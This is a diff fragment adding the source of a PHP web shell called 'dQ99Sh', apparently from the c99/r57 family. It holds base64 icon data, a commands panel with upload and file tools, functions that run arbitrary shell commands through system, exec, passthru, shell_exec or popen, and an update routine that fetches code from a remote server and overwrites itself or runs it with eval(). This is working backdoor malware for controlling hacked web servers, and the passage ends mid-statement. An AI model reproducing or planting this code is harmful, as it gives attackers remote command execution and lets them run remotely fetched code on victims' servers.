+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwdQtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9dQwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSdQ10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7dQ08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LdQ9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDdQ8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"dQEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAIABAAAAAP///ywAAAAAEAAQAAACJkQeoMua1tBxqLH37HU6arxZYLdIZMmd0Oqp". +"aGeyYpqJlRG/rlwAADs=", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEdQXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" +); +//Untuk optimalisasi ukuran dan kecepatan. 
+$imgequals = array(
+ "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+ "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+ "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+ "ext_html"=>array("ext_html","ext_htm"),
+ "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+ "ext_lnk"=>array("ext_lnk","ext_url"),
+ "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+ "ext_doc"=>array("ext_doc","ext_dot"),
+ "ext_js"=>array("ext_js","ext_vbs"),
+ "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+ "ext_wri"=>array("ext_wri","ext_rtf"),
+ "ext_swf"=>array("ext_swf","ext_fla"),
+ "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+ "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+);
+if (!$getall) {
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+ if (empty($images[$img])) {$img = "small_unk";}
+ if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+ echo base64_decode($images[$img]);
+}
+else {
+ foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
        ");}}}} + natsort($images); + $k = array_keys($images); + echo "
        "; + foreach ($k as $u) {echo $u.":
        ";} + echo "
        "; +} +exit; +} +if ($act == "about") { + echo "
        Credits:
        Idea, leading and coding by tristram [CCTeaM]
        ". + "Beta-testing and some tips by NukLeoN [AnTiSh@Re tEaM]
        ". + "Re-Coding, tricks, html and css by diKi [FeeLCoMz CoMMuNiTy]

        ". + "Report bugs to r57.biz
        "; +} +echo "\n"; +/*** COMMANDS PANEL ***/ +?> +
        .: COMMANDS PANEL :.
        + + + + + + + + + + + + + + + + +
        Command:
        + + + + +
        +
        Quick Commands:
        + + + + +
        +
        Upload:
        + + + +
        +
        PHP Filesystem: + + +\r\n". + "\r\n". + " \r\n". + " \r\n". + "
        \r\n"; + foreach ($sh_sourcez as $e => $o) { + echo "\r\n"; + } + echo "\r\n"; +?> +
        Search File:
        + regexp +
        +
        Create File:
        + Overwrite +
        View File:
        + +
        + + +&1', 'r'); + if ( is_resource($h) ) { + while ( !feof($h) ) { $output .= fread($h, 2096); } + pclose($h); + } + } + elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } + elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); } + return $output; +} +function dQ99exec2($cmd) { + $output = ""; + if ( enabled("system") ) { @ob_start(); system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("exec") ) { exec($cmd,$o); $output = join("\r\n",$o); } + elseif ( enabled("shell_exec") ) { $output = shell_exec($cmd); } + elseif ( enabled("passthru") ) { @ob_start(); passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } + elseif ( enabled("popen") ) { + $h = popen($cmd.' 2>&1', 'r'); + if ( is_resource($h) ) { + while ( !feof($h) ) { $output .= fread($h, 2096); } + pclose($h); + } + } + return $output; +} +function which($pr) { + $path = dQ99exec("which $pr"); + if(!empty($path)) { return $path; } else { return $pr; } +} + +function get_status() { + function showstat($sup,$stat) { + if ($stat=="on") { return "$sup: ON"; } + else { return "$sup: OFF"; } + } + $arrfunc = array( + array("MySQL","mysql_connect"), + array("MSSQL","mssql_connect"), + array("Oracle","ocilogon"), + array("PostgreSQL","pg_connect"), + array("Curl","curl_version"), + ); + $arrcmd = array( + array("Fetch","fetch --help"), + array("Wget","wget --help"), + array("Perl","perl -v"), + ); + + $statinfo = array(); + foreach ($arrfunc as $func) { + if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); } + else { $statinfo[] = showstat($func[0],"off"); } + } + $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off"); + foreach ($arrcmd as $cmd) { + if 
(dQ99exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); } + else { $statinfo[] = showstat($cmd[0],"off"); } + } + return implode(" ",$statinfo); +} +function showdisfunc() { + if ($disablefunc = @ini_get("disable_functions")) { + return "".$disablefunc.""; + } + else { return "NONE"; } +} +function disp_drives($curdir,$surl) { + $letters = ""; + $v = explode("\\",$curdir); + $v = $v[0]; + foreach (range("A","Z") as $letter) { + $bool = $isdiskette = $letter == "A"; + if (!$bool) { $bool = is_dir($letter.":\\"); } + if ($bool) { + $letters .= " "; + if ($letter.":" != $v) { $letters .= $letter; } + else { $letters .= "".$letter.""; } + $letters .= " "; + } + } + if (!empty($letters)) { Return $letters; } + else {Return "None"; } +} +function disp_freespace($curdrv) { + $free = @disk_free_space($curdrv); + $total = @disk_total_space($curdrv); + if ($free === FALSE) { $free = 0; } + if ($total === FALSE) { $total = 0; } + if ($free < 0) { $free = 0; } + if ($total < 0) { $total = 0; } + $used = $total-$free; + $free_percent = round(100/($total/$free),2)."%"; + $free = view_size($free); + $total = view_size($total); + return "$free of $total ($free_percent)"; +} +## dQ99Sh UPDATE FUNCTIONS ## +function dQ99getsource($fn) { + global $dQ99sh_sourcesurl; + $array = array( + "dQ99sh.php" => "dQ99sh.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($dQ99sh_sourcesurl.$name);} + else {return FALSE;} +} +function dQ99sh_getupdate($update = TRUE) { + $url = $GLOBALS["dQ99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0"); + $data = @file_get_contents($url); + if (!$data) { return "Can't connect to update-server!"; } + else { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" 
and $data{1} == "\x03") { + $string = explode("|",$string); + if ($update) { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download dQ99shell.php manually here.";} + else { + fwrite($fp,$source); + fclose($fp); + return "Update completed!"; + } + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") { + eval($string); + return 1; + } + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +function dQ99_buff_prepare() { + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +function dQ99_sess_put($data) { + global $sess_cookie; + global $sess_data; + dQ99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +## END dQ99Sh UPDATE FUNCTIONS ## +## FILESYSTEM FUNCTIONS ## +function fs_copy_dir($d,$t) { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) { + if (($o != ".") and ($o != "..")) { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = 
